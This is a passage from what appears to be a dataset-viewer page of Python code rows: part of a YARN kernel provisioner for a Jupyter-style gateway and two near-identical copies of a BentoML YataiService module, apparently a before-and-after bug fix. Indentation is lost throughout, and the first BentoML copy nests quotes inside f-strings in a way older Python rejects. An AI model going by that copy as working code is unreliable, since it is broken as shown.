f"has used capacity <= {partition_availability_threshold}%")
yarn_available = self.resource_mgr.cluster_scheduler_queue_availability(self.candidate_partition,
partition_availability_threshold)
if not yarn_available:
self.log.debug(
f"Retrying for {self.yarn_resource_check_wait_time} ms since resources are not available")
while not yarn_available:
self.handle_yarn_queue_timeout()
yarn_available = self.resource_mgr.cluster_scheduler_queue_availability(
self.candidate_partition, partition_availability_threshold)
# subtracting the total amount of time spent for polling for queue availability
self.launch_timeout -= RemoteProvisionerBase.get_time_diff(self.start_time)
def handle_yarn_queue_timeout(self) -> None:
time.sleep(poll_interval)
time_interval = RemoteProvisionerBase.get_time_diff(self.start_time)
if time_interval > self.yarn_resource_check_wait_time:
reason = f"Yarn Compute Resource is unavailable after {self.yarn_resource_check_wait_time} seconds"
self.log_and_raise(TimeoutError(reason))
@property
def has_process(self) -> bool:
return self.local_proc is not None or self.application_id is not None
async def poll(self) -> Optional[int]:
"""Submitting a new kernel/app to YARN will take a while to be ACCEPTED.
Thus application ID will probably not be available immediately for poll.
So will regard the application as RUNNING when application ID still in ACCEPTED or SUBMITTED state.
:return: None if the application's ID is available and state is ACCEPTED/SUBMITTED/RUNNING. Otherwise 0.
"""
result = 0
if self._get_application_id():
state = self._query_app_state_by_id(self.application_id)
if state in YarnProvisioner.initial_states:
result = None
# The following produces too much output (every 3 seconds by default), so commented-out at this time.
# self.log.debug("YarnProcessProxy.poll, application ID: {}, kernel ID: {}, state: {}".
# format(self.application_id, self.kernel_id, state))
return result
async def send_signal(self, signum: int) -> None:
"""Currently only support 0 as poll and other as kill.
:param signum
:return:
"""
if signum == 0:
return await self.poll()
elif signum == signal.SIGKILL:
return await self.kill()
else:
# Yarn api doesn't support the equivalent to interrupts, so take our chances
# via a remote signal. Note that this condition cannot check against the
# signum value because alternate interrupt signals might be in play.
return await super().send_signal(signum)
async def kill(self, restart: bool = False) -> None:
"""Kill a kernel.
:return: None if the application existed and is not in RUNNING state, False otherwise.
"""
state = None
result = False
if self._get_application_id():
result, state = await self.shutdown_application()
if result is False: # We couldn't terminate via Yarn, try remote signal
result = await super().send_signal(signal.SIGKILL) # Must use super here, else infinite
self.log.debug(f"YarnProvisioner.kill, application ID: {self.application_id}, "
f"kernel ID: {self.kernel_id}, state: {state}, result: {result}")
return result
async def terminate(self, restart: bool = False) -> None:
"""Terminate a kernel.
Similar to kill except that the follow-on kill step is not taken if termination is not confirmed.
"""
state = None
result = False
if self._get_application_id():
result, state = await self.shutdown_application()
self.log.debug(f"YarnProvisioner.terminate, application ID: {self.application_id}, "
f"kernel ID: {self.kernel_id}, state: {state}, result: {result}")
return result
async def shutdown_application(self) -> Tuple[Optional[bool], str]:
"""Shuts down the YARN application, returning None if final state is confirmed, False otherwise."""
result = False
self._kill_app_by_id(self.application_id)
# Check that state has moved to a final state (most likely KILLED)
i = 1
state = self._query_app_state_by_id(self.application_id)
while state not in YarnProvisioner.final_states and i <= max_poll_attempts:
await asyncio.sleep(poll_interval)
state = self._query_app_state_by_id(self.application_id)
i = i + 1
if state in YarnProvisioner.final_states:
result = None
return result, state
async def cleanup(self, restart: bool = False):
""""""
# we might have a defunct process (if using waitAppCompletion = false) - so poll, kill, wait when we have
# a local_proc.
if self.local_proc:
self.log.debug(f"YarnProvisioner.cleanup: Clearing possible defunct "
f"process, pid={self.local_proc.pid}...")
if self.local_proc.poll():
self.local_proc.kill()
self.local_proc.wait()
self.local_proc = None
# reset application id to force new query - handles kernel restarts/interrupts
self.application_id = None
# for cleanup, we should call the superclass last
await super().cleanup(restart=restart)
async def confirm_remote_startup(self):
"""
Confirms the yarn application is in a started state before returning.
Should post-RUNNING states be unexpectedly encountered (FINISHED, KILLED, FAILED)
then we must throw, otherwise the rest of the gateway will believe its talking
to a valid kernel.
Note: This is a complete override of the superclass method.
"""
self.start_time = RemoteProvisionerBase.get_current_time()
i = 0
ready_to_connect = False # we're ready to connect when we have a connection file to use
while not ready_to_connect:
i += 1
await self.handle_launch_timeout()
if self._get_application_id(True):
# Once we have an application ID, start monitoring state, obtain assigned host and get connection info
app_state = self._get_application_state()
if app_state in YarnProvisioner.final_states:
error_message = f"KernelID: '{self.kernel_id}', ApplicationID: '{self.application_id}' " \
f"unexpectedly found in state '{app_state}' during kernel startup!"
self.log_and_raise(RuntimeError(error_message))
self.log.debug(f"{i}: State: '{app_state}', Host: '{self.assigned_host}', "
f"KernelID: '{self.kernel_id}', ApplicationID: '{self.application_id}'")
if self.assigned_host != '':
ready_to_connect = await self.receive_connection_info()
else:
self.detect_launch_failure()
async def handle_launch_timeout(self):
"""
Checks to see if the kernel launch timeout has been exceeded while awaiting connection info.
Note: This is a complete override of the superclass method.
"""
await asyncio.sleep(poll_interval)
time_interval = RemoteProvisionerBase.get_time_diff(self.start_time)
if time_interval > self.launch_timeout:
reason = f"Application ID is None. Failed to submit a new application to YARN within " \
f"{self.launch_timeout} seconds. Check server log for more information."
if self._get_application_id(True):
if self._query_app_state_by_id(self.application_id) != "RUNNING":
reason = f"YARN resources unavailable after {time_interval} seconds for " \
f"app {self.application_id}, launch timeout: {self.launch_timeout}! " \
"Check YARN configuration."
else:
reason = f"App {self.application_id} is RUNNING, but waited too long " \
f"({self.launch_timeout} secs) to get connection file. " \
f"Check YARN logs for more information."
await self.kill()
timeout_message = f"KernelID: '{self.kernel_id}' launch timeout due to: {reason}"
self.log_and_raise(TimeoutError(timeout_message))
async def get_provisioner_info(self) -> Dict:
"""Captures the base information necessary for kernel persistence relative to YARN clusters."""
provisioner_info = await super().get_provisioner_info()
provisioner_info.update({'application_id': self.application_id})
return provisioner_info
async def load_provisioner_info(self, provisioner_info: Dict) -> None:
"""Loads the base information necessary for kernel persistence relative to YARN clusters."""
await super().load_provisioner_info(provisioner_info)
self.application_id = provisioner_info['application_id']
def _get_application_state(self) -> str:
# Gets the current application state using the application_id already obtained. Once the assigned host
# has been identified, 'amHostHttpAddress' is nolonger accessed.
app_state = self.last_known_state
app = self._query_app_by_id(self.application_id)
if app:
if app.get('state'):
app_state = app.get('state')
self.last_known_state = app_state
if self.assigned_host == '' and app.get('amHostHttpAddress'):
self.assigned_host = app.get('amHostHttpAddress').split(':')[0]
# Set the kernel manager ip to the actual host where the application landed.
self.assigned_ip = socket.gethostbyname(self.assigned_host)
return app_state
def _get_application_id(self, ignore_final_states: bool = False) -> str:
# Return the kernel's YARN application ID if available, otherwise None. If we're obtaining application_id
# from scratch, do not consider kernels in final states.
if not self.application_id:
app = self._query_app_by_name(self.kernel_id)
state_condition = True
if type(app) is dict:
state = app.get('state')
self.last_known_state = state
if ignore_final_states:
state_condition = state not in YarnProvisioner.final_states
if len(app.get('id', '')) > 0 and state_condition:
self.application_id = app['id']
time_interval = RemoteProvisionerBase.get_time_diff(self.start_time)
self.log.info(f"ApplicationID: '{app['id']}' assigned for KernelID: '{self.kernel_id}', "
f"state: {state}, {time_interval} seconds after starting.")
if not self.application_id:
self.log.debug(f"ApplicationID not yet assigned for KernelID: '{self.kernel_id}' - retrying...")
return self.application_id
def _query_app_by_name(self, kernel_id: str) -> dict:
"""Retrieve application by using kernel_id as the unique app name.
With the started_time_begin as a parameter to filter applications started earlier than the target one from YARN.
When submit a new app, it may take a while for YARN to accept and run and generate the application ID.
Note: if a kernel restarts with the same kernel id as app name, multiple applications will be returned.
For now, the app/kernel with the top most application ID will be returned as the target app, assuming the app
ID will be incremented automatically on the YARN side.
:param kernel_id: as the unique app name for query
:return: The JSON object of an application.
"""
top_most_app_id = ''
target_app = None
try:
response = self.resource_mgr.cluster_applications(started_time_begin=str(self.start_time))
except socket.error as sock_err:
if sock_err.errno == errno.ECONNREFUSED:
self.log.warning(f"YARN RM address: '{self.rm_addr}' refused the connection. "
f"Is the resource manager running?")
else:
self.log.warning(f"Query for kernel ID '{kernel_id}' failed with exception: "
f"{type(sock_err)} - '{sock_err}'. Continuing...")
except Exception as e:
self.log.warning(f"Query for kernel ID '{kernel_id}' failed with exception: "
f"{type(e)} - '{e}'. Continuing...")
else:
data = response.data
if type(data) is dict and type(data.get("apps")) is dict and 'app' in data.get("apps"):
for app in data['apps']['app']:
if app.get('name', '').find(kernel_id) >= 0 and app.get('id') > top_most_app_id:
target_app = app
top_most_app_id = app.get('id')
return target_app
def _query_app_by_id(self, app_id: str) -> dict:
"""Retrieve an application by application ID.
:param app_id
:return: The JSON object of an application.
"""
app = None
try:
response = self.resource_mgr.cluster_application(application_id=app_id)
except Exception as e:
self.log.warning(f"Query for application ID '{app_id}' failed with exception: '{e}'. Continuing...")
else:
data = response.data
if type(data) is dict and 'app' in data:
app = data['app']
return app
def _query_app_state_by_id(self, app_id: str) -> str:
"""Return the state of an application. If a failure occurs, the last known state is returned.
:param app_id:
:return: application state (str)
"""
state = self.last_known_state
try:
response = self.resource_mgr.cluster_application_state(application_id=app_id)
except Exception as e:
self.log.warning(f"Query for application '{app_id}' state failed with exception: '{e}'. "
f"Continuing with last known state = '{state}'...")
else:
state = response.data['state']
self.last_known_state = state
return state
def _kill_app_by_id(self, app_id: str) -> dict:
"""Kill an application. If the app's state is FINISHED or FAILED, it won't be changed to KILLED.
:param app_id
:return: The JSON response of killing the application.
"""
response = {}
try:
response = self.resource_mgr.cluster_application_kill(application_id=app_id)
except Exception as e:
self.log.warning(f"Termination of application '{app_id}' failed with exception: '{e}'. Continuing...")
return response
|
import atexit
import logging
import os
import subprocess
import time
from concurrent import futures
import certifi
import click
from bentoml import config
from bentoml.configuration import get_debug_mode
from bentoml.exceptions import BentoMLException
from bentoml.yatai.utils import ensure_node_available_or_raise, parse_grpc_url
def get_yatai_service(
channel_address=None,
access_token=None,
db_url=None,
repo_base_url=None,
s3_endpoint_url=None,
default_namespace=None,
):
channel_address = channel_address or config('yatai_service').get('url')
access_token = access_token or config('yatai_service').get('access_token')
channel_address = channel_address.strip()
if channel_address:
# Lazily import grpcio for YataiSerivce gRPC related actions
import grpc
from bentoml.yatai.proto.yatai_service_pb2_grpc import YataiStub
from bentoml.yatai.client.interceptor import header_client_interceptor
if any([db_url, repo_base_url, s3_endpoint_url, default_namespace]):
logger.warning(
"Using remote YataiService at `%s`, local YataiService configs "
"including db_url, repo_base_url, s3_endpoint_url and default_namespace"
"will all be ignored.",
channel_address,
)
logger.debug("Connecting YataiService gRPC server at: %s", channel_address)
scheme, addr = parse_grpc_url(channel_address)
header_adder_interceptor = header_client_interceptor.header_adder_interceptor(
'access_token', access_token
)
if scheme in ('grpcs', 'https'):
tls_root_ca_cert = (
config().get('yatai_service', 'tls_root_ca_cert')
# Adding also prev. name to ensure that old configurations do not break.
or config().get('yatai_service', 'client_certificate_file')
or certifi.where() # default: Mozilla ca cert
)
tls_client_key = config().get('yatai_service', 'tls_client_key') or None
tls_client_cert = config().get('yatai_service', 'tls_client_cert') or None
with open(tls_root_ca_cert, 'rb') as fb:
ca_cert = fb.read()
if tls_client_key:
with open(tls_client_key, 'rb') as fb:
tls_client_key = fb.read()
if tls_client_cert:
with open(tls_client_cert, 'rb') as fb:
tls_client_cert = fb.read()
credentials = grpc.ssl_channel_credentials(
ca_cert, tls_client_key, tls_client_cert
)
channel = grpc.intercept_channel(
grpc.secure_channel(addr, credentials), header_adder_interceptor
)
else:
channel = grpc.intercept_channel(
grpc.insecure_channel(addr), header_adder_interceptor
)
return YataiStub(channel)
else:
from bentoml.yatai.yatai_service_impl import get_yatai_service_impl
LocalYataiService = get_yatai_service_impl()
logger.debug("Creating local YataiService instance")
return LocalYataiService(
db_url=db_url,
repo_base_url=repo_base_url,
s3_endpoint_url=s3_endpoint_url,
default_namespace=default_namespace,
)
def start_yatai_service_grpc_server(
db_url, repo_base_url, grpc_port, ui_port, with_ui, s3_endpoint_url, base_url
):
# Lazily import grpcio for YataiSerivce gRPC related actions
import grpc
from bentoml.yatai.yatai_service_impl import get_yatai_service_impl
from bentoml.yatai.proto.yatai_service_pb2_grpc import add_YataiServicer_to_server
from bentoml.yatai.proto.yatai_service_pb2_grpc import YataiServicer
YataiServicerImpl = get_yatai_service_impl(YataiServicer)
yatai_service = YataiServicerImpl(
db_url=db_url, repo_base_url=repo_base_url, s3_endpoint_url=s3_endpoint_url,
)
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
add_YataiServicer_to_server(yatai_service, server)
debug_mode = get_debug_mode()
if debug_mode:
try:
logger.debug('Enabling gRPC server reflection for debugging')
from grpc_reflection.v1alpha import reflection
from bentoml.yatai.proto import yatai_service_pb2
SERVICE_NAMES = (
yatai_service_pb2.DESCRIPTOR.services_by_name['Yatai'].full_name,
reflection.SERVICE_NAME,
)
reflection.enable_server_reflection(SERVICE_NAMES, server)
except ImportError:
logger.debug(
'Failed to enable gRPC server reflection, missing required package: '
'"pip install grpcio-reflection"'
)
server.add_insecure_port(f'[::]:{grpc_port}')
server.start()
if with_ui:
web_ui_log_path = os.path.join(
config("logging").get("BASE_LOG_DIR"),
config('logging').get("yatai_web_server_log_filename"),
)
ensure_node_available_or_raise()
yatai_grpc_server_address = f'localhost:{grpc_port}'
async_start_yatai_service_web_ui(
yatai_grpc_server_address, ui_port, web_ui_log_path, debug_mode, base_url
)
# We don't import _echo function from click_utils because of circular dep
click.echo(
f'* Starting BentoML YataiService gRPC Server\n'
f'* Debug mode: { 'on' if debug_mode else 'off'}\n'
f'''* Web UI: {f"running on http://127.0.0.1:{ui_port}/{base_url}"
if (with_ui and base_url!=".")
else f"running on http://127.0.0.1:{ui_port}" if with_ui else "off"}\n'''
f'* Running on 127.0.0.1:{grpc_port} (Press CTRL+C to quit)\n'
f'* Help and instructions: '
f'https://docs.bentoml.org/en/latest/guides/yatai_service.html\n'
f'{f'* Web server log can be found here: {web_ui_log_path}' if with_ui else ''}'
f'\n-----\n'
f'* Usage in Python:\n'
f'* bento_svc.save(yatai_url="127.0.0.1:{grpc_port}")\n'
f'* bentoml.yatai.client.get_yatai_client("127.0.0.1:{grpc_port}").repository.'
f'list()\n'
f'* Usage in CLI:\n'
f'* bentoml list --yatai-url=127.0.0.1:{grpc_port}\n'
f'* bentoml containerize IrisClassifier:latest --yatai-url=127.0.0.1:'
f'{grpc_port}\n'
f'* bentoml push IrisClassifier:20200918001645_CD2886 --yatai-url=127.0.0.1:'
f'{grpc_port}\n'
f'* bentoml pull IrisClassifier:20200918001645_CD2886 --yatai-url=127.0.0.1:'
f'{grpc_port}\n'
f'* bentoml retrieve IrisClassifier:20200918001645_CD2886 '
f'--yatai-url=127.0.0.1:{grpc_port} --target_dir="/tmp/foo/bar"\n'
f'* bentoml delete IrisClassifier:20200918001645_CD2886 '
f'--yatai-url=127.0.0.1:{grpc_port}\n'
# TODO: simplify the example usage here once related documentation is ready
)
try:
while True:
time.sleep(_ONE_DAY_IN_SECONDS)
except KeyboardInterrupt:
logger.info("Terminating YataiService gRPC server..")
server.stop(grace=None)
def _is_web_server_debug_tools_available(root_dir):
return (
os.path.exists(os.path.join(root_dir, 'node_modules/.bin', 'concurrently'))
and os.path.exists(os.path.join(root_dir, 'node_modules/.bin', 'ts-node'))
and os.path.exists(os.path.join(root_dir, 'node_modules/.bin', 'nodemon'))
)
def async_start_yatai_service_web_ui(
yatai_server_address, ui_port, base_log_path, debug_mode, web_prefix_path
):
if ui_port is not None:
ui_port = ui_port if isinstance(ui_port, str) else str(ui_port)
web_ui_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'web'))
web_prefix_path = web_prefix_path.strip("/")
if debug_mode:
# Only when src/index.ts exists, we will run dev (nodemon)
if os.path.exists(
os.path.join(web_ui_dir, 'src/index.ts')
) and _is_web_server_debug_tools_available(web_ui_dir):
web_ui_command = [
'npm',
'run',
'dev',
'--',
yatai_server_address,
ui_port,
base_log_path,
web_prefix_path,
]
else:
web_ui_command = [
'node',
'dist/bundle.js',
yatai_server_address,
ui_port,
base_log_path,
web_prefix_path,
]
else:
if not os.path.exists(os.path.join(web_ui_dir, 'dist', 'bundle.js')):
raise BentoMLException(
'Yatai web client built is missing. '
'Please run `npm run build` in the bentoml/yatai/web directory '
'and then try again'
)
web_ui_command = [
'node',
'dist/bundle.js',
yatai_server_address,
ui_port,
base_log_path,
web_prefix_path,
]
web_proc = subprocess.Popen(
web_ui_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=web_ui_dir
)
is_web_proc_running = web_proc.poll() is None
if not is_web_proc_running:
web_proc_output = web_proc.stdout.read().decode('utf-8')
logger.error(f'return code: {web_proc.returncode} {web_proc_output}')
raise BentoMLException('Yatai web ui did not start properly')
atexit.register(web_proc.terminate)
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
logger = logging.getLogger(__name__)
| import atexit
import logging
import os
import subprocess
import time
from concurrent import futures
import certifi
import click
from bentoml import config
from bentoml.configuration import get_debug_mode
from bentoml.exceptions import BentoMLException
from bentoml.yatai.utils import ensure_node_available_or_raise, parse_grpc_url
def get_yatai_service(
channel_address=None,
access_token=None,
db_url=None,
repo_base_url=None,
s3_endpoint_url=None,
default_namespace=None,
):
channel_address = channel_address or config('yatai_service').get('url')
access_token = access_token or config('yatai_service').get('access_token')
channel_address = channel_address.strip()
if channel_address:
# Lazily import grpcio for YataiSerivce gRPC related actions
import grpc
from bentoml.yatai.proto.yatai_service_pb2_grpc import YataiStub
from bentoml.yatai.client.interceptor import header_client_interceptor
if any([db_url, repo_base_url, s3_endpoint_url, default_namespace]):
logger.warning(
"Using remote YataiService at `%s`, local YataiService configs "
"including db_url, repo_base_url, s3_endpoint_url and default_namespace"
"will all be ignored.",
channel_address,
)
logger.debug("Connecting YataiService gRPC server at: %s", channel_address)
scheme, addr = parse_grpc_url(channel_address)
header_adder_interceptor = header_client_interceptor.header_adder_interceptor(
'access_token', access_token
)
if scheme in ('grpcs', 'https'):
tls_root_ca_cert = (
config().get('yatai_service', 'tls_root_ca_cert')
# Adding also prev. name to ensure that old configurations do not break.
or config().get('yatai_service', 'client_certificate_file')
or certifi.where() # default: Mozilla ca cert
)
tls_client_key = config().get('yatai_service', 'tls_client_key') or None
tls_client_cert = config().get('yatai_service', 'tls_client_cert') or None
with open(tls_root_ca_cert, 'rb') as fb:
ca_cert = fb.read()
if tls_client_key:
with open(tls_client_key, 'rb') as fb:
tls_client_key = fb.read()
if tls_client_cert:
with open(tls_client_cert, 'rb') as fb:
tls_client_cert = fb.read()
credentials = grpc.ssl_channel_credentials(
ca_cert, tls_client_key, tls_client_cert
)
channel = grpc.intercept_channel(
grpc.secure_channel(addr, credentials), header_adder_interceptor
)
else:
channel = grpc.intercept_channel(
grpc.insecure_channel(addr), header_adder_interceptor
)
return YataiStub(channel)
else:
from bentoml.yatai.yatai_service_impl import get_yatai_service_impl
LocalYataiService = get_yatai_service_impl()
logger.debug("Creating local YataiService instance")
return LocalYataiService(
db_url=db_url,
repo_base_url=repo_base_url,
s3_endpoint_url=s3_endpoint_url,
default_namespace=default_namespace,
)
def start_yatai_service_grpc_server(
db_url, repo_base_url, grpc_port, ui_port, with_ui, s3_endpoint_url, base_url
):
# Lazily import grpcio for YataiSerivce gRPC related actions
import grpc
from bentoml.yatai.yatai_service_impl import get_yatai_service_impl
from bentoml.yatai.proto.yatai_service_pb2_grpc import add_YataiServicer_to_server
from bentoml.yatai.proto.yatai_service_pb2_grpc import YataiServicer
YataiServicerImpl = get_yatai_service_impl(YataiServicer)
yatai_service = YataiServicerImpl(
db_url=db_url, repo_base_url=repo_base_url, s3_endpoint_url=s3_endpoint_url,
)
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
add_YataiServicer_to_server(yatai_service, server)
debug_mode = get_debug_mode()
if debug_mode:
try:
logger.debug('Enabling gRPC server reflection for debugging')
from grpc_reflection.v1alpha import reflection
from bentoml.yatai.proto import yatai_service_pb2
SERVICE_NAMES = (
yatai_service_pb2.DESCRIPTOR.services_by_name['Yatai'].full_name,
reflection.SERVICE_NAME,
)
reflection.enable_server_reflection(SERVICE_NAMES, server)
except ImportError:
logger.debug(
'Failed to enable gRPC server reflection, missing required package: '
'"pip install grpcio-reflection"'
)
server.add_insecure_port(f'[::]:{grpc_port}')
server.start()
if with_ui:
web_ui_log_path = os.path.join(
config("logging").get("BASE_LOG_DIR"),
config('logging').get("yatai_web_server_log_filename"),
)
ensure_node_available_or_raise()
yatai_grpc_server_address = f'localhost:{grpc_port}'
async_start_yatai_service_web_ui(
yatai_grpc_server_address, ui_port, web_ui_log_path, debug_mode, base_url
)
# We don't import _echo function from click_utils because of circular dep
click.echo(
f'* Starting BentoML YataiService gRPC Server\n'
f'* Debug mode: { "on" if debug_mode else "off"}\n'
f'''* Web UI: {f"running on http://127.0.0.1:{ui_port}/{base_url}"
if (with_ui and base_url!=".")
else f"running on http://127.0.0.1:{ui_port}" if with_ui else "off"}\n'''
f'* Running on 127.0.0.1:{grpc_port} (Press CTRL+C to quit)\n'
f'* Help and instructions: '
f'https://docs.bentoml.org/en/latest/guides/yatai_service.html\n'
f'{f"* Web server log can be found here: {web_ui_log_path}" if with_ui else ""}'
f'\n-----\n'
f'* Usage in Python:\n'
f'* bento_svc.save(yatai_url="127.0.0.1:{grpc_port}")\n'
f'* bentoml.yatai.client.get_yatai_client("127.0.0.1:{grpc_port}").repository.'
f'list()\n'
f'* Usage in CLI:\n'
f'* bentoml list --yatai-url=127.0.0.1:{grpc_port}\n'
f'* bentoml containerize IrisClassifier:latest --yatai-url=127.0.0.1:'
f'{grpc_port}\n'
f'* bentoml push IrisClassifier:20200918001645_CD2886 --yatai-url=127.0.0.1:'
f'{grpc_port}\n'
f'* bentoml pull IrisClassifier:20200918001645_CD2886 --yatai-url=127.0.0.1:'
f'{grpc_port}\n'
f'* bentoml retrieve IrisClassifier:20200918001645_CD2886 '
f'--yatai-url=127.0.0.1:{grpc_port} --target_dir="/tmp/foo/bar"\n'
f'* bentoml delete IrisClassifier:20200918001645_CD2886 '
f'--yatai-url=127.0.0.1:{grpc_port}\n'
# TODO: simplify the example usage here once related documentation is ready
)
try:
while True:
time.sleep(_ONE_DAY_IN_SECONDS)
except KeyboardInterrupt:
logger.info("Terminating YataiService gRPC server..")
server.stop(grace=None)
def _is_web_server_debug_tools_available(root_dir):
return (
os.path.exists(os.path.join(root_dir, 'node_modules/.bin', 'concurrently'))
and os.path.exists(os.path.join(root_dir, 'node_modules/.bin', 'ts-node'))
and os.path.exists(os.path.join(root_dir, 'node_modules/.bin', 'nodemon'))
)
def async_start_yatai_service_web_ui(
yatai_server_address, ui_port, base_log_path, debug_mode, web_prefix_path
):
if ui_port is not None:
ui_port = ui_port if isinstance(ui_port, str) else str(ui_port)
web_ui_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'web'))
web_prefix_path = web_prefix_path.strip("/")
if debug_mode:
# Only when src/index.ts exists, we will run dev (nodemon)
if os.path.exists(
os.path.join(web_ui_dir, 'src/index.ts')
) and _is_web_server_debug_tools_available(web_ui_dir):
web_ui_command = [
'npm',
'run',
'dev',
'--',
yatai_server_address,
ui_port,
base_log_path,
web_prefix_path,
]
else:
web_ui_command = [
'node',
'dist/bundle.js',
yatai_server_address,
ui_port,
base_log_path,
web_prefix_path,
]
else:
if not os.path.exists(os.path.join(web_ui_dir, 'dist', 'bundle.js')):
raise BentoMLException(
'Yatai web client built is missing. '
'Please run `npm run build` in the bentoml/yatai/web directory '
'and then try again'
)
web_ui_command = [
'node',
'dist/bundle.js',
yatai_server_address,
ui_port,
base_log_path,
web_prefix_path,
]
web_proc = subprocess.Popen(
web_ui_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=web_ui_dir
)
is_web_proc_running = web_proc.poll() is None
if not is_web_proc_running:
web_proc_output = web_proc.stdout.read().decode('utf-8')
logger.error(f'return code: {web_proc.returncode} {web_proc_output}')
raise BentoMLException('Yatai web ui did not start properly')
atexit.register(web_proc.terminate)
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
logger = logging.getLogger(__name__)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.